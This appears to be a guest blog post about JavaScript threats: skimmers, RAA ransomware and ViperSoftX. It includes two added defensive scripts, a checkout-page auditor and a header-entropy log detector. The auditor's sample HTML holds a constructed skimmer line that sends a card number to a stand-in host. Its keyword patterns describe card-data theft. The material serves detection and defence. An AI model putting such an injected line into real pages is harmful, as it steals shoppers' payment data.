This blog was written by an independent guest blogger.
JavaScript is a very useful programming language. Netscape developers invented JavaScript in 1995, and it revolutionized the web. Before JavaScript, webpages could pretty much only contain text, images, and hyperlinks. JavaScript empowered web developers to make webpages interactive, dynamic rather than static. Think of picture menus that animated when your mouse cursor went over them, and applets that could give you your local weather forecast or tell you which web browser you’re using. And JavaScript can do many other things. As time went on, JavaScript became increasingly powerful. And it’s still commonly used, nearly 26 years later. The advent of HTML5 and later versions of CSS has given web developers more options for using client-side scripting to make webpages dynamic. But while Adobe Flash is dead, JavaScript is as popular as ever. I believe JavaScript is amazing.
Unfortunately, as a certain superhero says, “with great power comes great responsibility.” If JavaScript is used in the wrong way, a user’s privacy and security can be at risk. JavaScript is often used to fingerprint users: which web browser they’re using, which operating system they’re using, their IP address, and so on. Because of these privacy concerns, some clients such as Tor Browser warn about JavaScript being enabled and ask the user if they’d like to disable it. Unfortunately, JavaScript is used so frequently across the web that disabling it can break the functionality of many popular websites and web apps in significant ways. Many web apps won’t even load at all without JavaScript being enabled.
The web is one of the most common vectors for user-targeting cyber threats. So let’s examine some of them, and then consider some ways to deal with them.
JavaScript skimmers
Card skimmers are a common means of stealing credit card and debit card data from consumers through ATMs and point-of-sale devices. They usually manifest as a physical device that’s placed on top of a legitimate card reader. Retailers and banks are often unaware when a threat actor puts a card skimmer on one of their machines.
JavaScript skimmers are a similar concept, but implemented as JavaScript code injected into an online retailer’s software-based point of sale. One cyber attack group, Magecart, is known to inject JavaScript skimmers into ecommerce sites. Magecart started to become a significant threat in early 2020. They’re known to carefully study the vulnerabilities in specific ecommerce sites and tailor their intrusion into each web application accordingly.
Ecommerce retailers should conduct application security testing on their own websites so they can find and remove Magecart’s JavaScript skimmers and protect their customers. There isn’t much that users can do, as disabling JavaScript in their web browsers can break too much functionality. Online retailers need to be proactive.
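As an added example (not code from the original post or from any product it names), here is a small Node.js check a retailer could run against its own checkout page HTML: it flags script tags loaded from hosts outside an allowlist, third-party scripts without a Subresource Integrity hash, and inline scripts that both read payment fields and make network calls. The allowlisted hosts, the keyword lists and the sample HTML are constructed assumptions.

```javascript
// Added example, not from the original post: an integrity check a retailer
// can run over its own checkout page HTML to spot injected scripts.
// Hosts, keyword lists and the sample HTML below are constructed assumptions.
const ALLOWED_SCRIPT_HOSTS = new Set(["shop.example", "cdn.example"]);
const FIRST_PARTY_HOST = "shop.example";

// A payment-page script that both reads card fields and sends data over the
// network deserves review; neither pattern alone is conclusive.
const CARD_FIELD_WORDS = /\b(cardnumber|card_number|cvv|cvc|expiry)\b/i;
const NETWORK_WORDS = /\b(fetch|XMLHttpRequest|sendBeacon|new Image)\b/;

function auditCheckoutHtml(html) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (src) {
      let host = null;
      try { host = new URL(src[1], `https://${FIRST_PARTY_HOST}/`).hostname; } catch {}
      if (!host || !ALLOWED_SCRIPT_HOSTS.has(host)) {
        findings.push({ kind: "unexpected-script-host", detail: src[1] });
      }
      // Third-party scripts should pin their content with an integrity hash.
      if (host !== FIRST_PARTY_HOST && !/\bintegrity\s*=/i.test(attrs)) {
        findings.push({ kind: "missing-sri", detail: src[1] });
      }
    } else if (CARD_FIELD_WORDS.test(body) && NETWORK_WORDS.test(body)) {
      findings.push({ kind: "inline-card-exfil-pattern", detail: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed checkout page: one legitimate CDN script, one unknown third-party
// script without SRI, and one inline script matching the exfiltration pattern.
const SAMPLE_HTML = `
<script src="https://cdn.example/checkout.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://tracker.invalid/t.js"></script>
<script>
  var n = document.getElementById("cardnumber").value;
  navigator.sendBeacon("https://tracker.invalid/c", n);
</script>`;

for (const f of auditCheckoutHtml(SAMPLE_HTML)) {
  console.log(`${f.kind}: ${f.detail}`);
}
```

Run it on a periodic fetch of the live checkout page and alert on any finding; a clean page returns an empty list.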
JavaScript ransomware
One of the earliest examples of JavaScript-based ransomware emerged in 2016, and it’s called RAA. It appeared as a JavaScript file (.js) attached to an email. If opened on a Windows machine, it would execute in Windows Script Host.
This was an effective way to execute malware on a Windows machine, as a JavaScript file isn’t flagged as potentially harmful the way an EXE or BAT file is.
Its Russian-language ransom note demanded about $250 in cryptocurrency for a user to recover their files. But these days, ransomware is more likely to target enterprise and institutional computers, demand greater ransoms, and even steal data from victims: an attack on confidentiality, not just availability.
ViperSoftX
ViperSoftX is a JavaScript-based Remote Access Trojan that was discovered in 2019. It targets Windows vulnerabilities and is designed to steal cryptocurrency, which it does by looking for cryptocurrency wallet data on the targeted PC. It focuses on Ethereum and Bitcoin, two of the most commonly used cryptocurrencies around.
Once ViperSoftX establishes persistence by copying itself into the user’s %APPDATA% directory, it injects data into HTTP headers to communicate with the cyber attacker’s command and control servers. It really is a terrible piece of malware, and it’s evidence that JavaScript-based malware is becoming much more sophisticated.
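As an added example (not from the original post), here is a Node.js heuristic a defender could run over outbound proxy logs to spot the kind of header-borne channel described above: non-standard request headers carrying long, high-entropy values. The one-header-per-line log format, the list of standard headers, the thresholds and the log excerpt are all constructed assumptions, not a signature for ViperSoftX itself.

```javascript
// Added example, not from the original post: a log heuristic for spotting
// outbound requests whose non-standard headers carry encoded data, the kind of
// channel the post says ViperSoftX uses. The "<dest> <Header>: <value>" format
// (one header per line), the header list and the thresholds are assumptions.
const STANDARD_HEADERS = new Set([
  "host", "user-agent", "accept", "accept-language", "accept-encoding",
  "content-type", "content-length", "cookie", "referer", "connection",
  "x-requested-with", "origin", "cache-control", "pragma",
]);
// Shannon entropy in bits per character; base64 or hex blobs score well
// above ordinary header values such as a MIME type.
function entropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const c of counts.values()) {
    const p = c / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}
function parseLine(line) {
  const m = /^(\S+)\s+([^:]+):\s*(.*)$/.exec(line);
  return m ? { dest: m[1], name: m[2].toLowerCase(), value: m[3] } : null;
}
// Flag non-standard headers whose value is both long and high-entropy.
function flagSuspiciousHeaders(lines, { minLen = 32, minEntropy = 4.0 } = {}) {
  const hits = [];
  for (const line of lines) {
    const h = parseLine(line);
    if (!h || STANDARD_HEADERS.has(h.name)) continue;
    const e = entropy(h.value);
    if (h.value.length >= minLen && e >= minEntropy) {
      hits.push({ dest: h.dest, header: h.name, entropy: Number(e.toFixed(2)) });
    }
  }
  return hits;
}
// Constructed log excerpt: three ordinary lines and one custom header carrying
// a base64 blob to an unfamiliar destination.
const SAMPLE_LOG = [
  "shop.example Accept: text/html",
  "shop.example User-Agent: Mozilla/5.0",
  "shop.example X-Requested-With: XMLHttpRequest",
  "203.0.113.7 X-Session-Data: aGVsbG8gd29ybGQsIHRoaXMgaXMgYSBsb25nIGVuY29kZWQgYmxvYg==",
];
for (const hit of flagSuspiciousHeaders(SAMPLE_LOG)) {
  console.log(`${hit.dest} ${hit.header} entropy=${hit.entropy}`);
}
```

Tune the thresholds against a baseline of your own traffic first, since some legitimate custom headers (signed tokens, for instance) are also long and high-entropy and will need allowlisting.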
What can users do?
As mentioned earlier, disabling JavaScript in most web browsers is possible. But as more than 90% of webpages use JavaScript, disabling it is often very impractical.
Fortunately there are other things that users can do to protect themselves from many JavaScript exploits.
Startpage is one of the most popular search platforms designed to protect user privacy. It does so by acting as a proxy, keeping the user anonymous while delivering Google search results. You might wonder what this has to do with protecting a user from JavaScript exploits. Well, if you search with Startpage and click on the Anonymous View icon in your chosen search result, the feature acts as a web proxy while you’re on the new webpage. JavaScript will run normally, but it’ll only be able to fingerprint Startpage’s server, not the user’s client machine. This protects the user’s privacy from the web servers they visit.
So that’s something users can do. But what about developers?
OWASP recommends a number of Source Code Analysis Tools for the web. These are applications designed specifically to let developers test their code for certain classes of vulnerabilities. Some Source Code Analysis Tools are designed to find JavaScript vulnerabilities, such as Agnitio, BlueClosure BC Detect, and CodeSec. Some of these tools work directly in an IDE, flagging JavaScript vulnerabilities before the code is deployed in the first place.
JavaScript is a wonderful thing. But it’s good for users and developers alike to be vigilant and aware of its risks.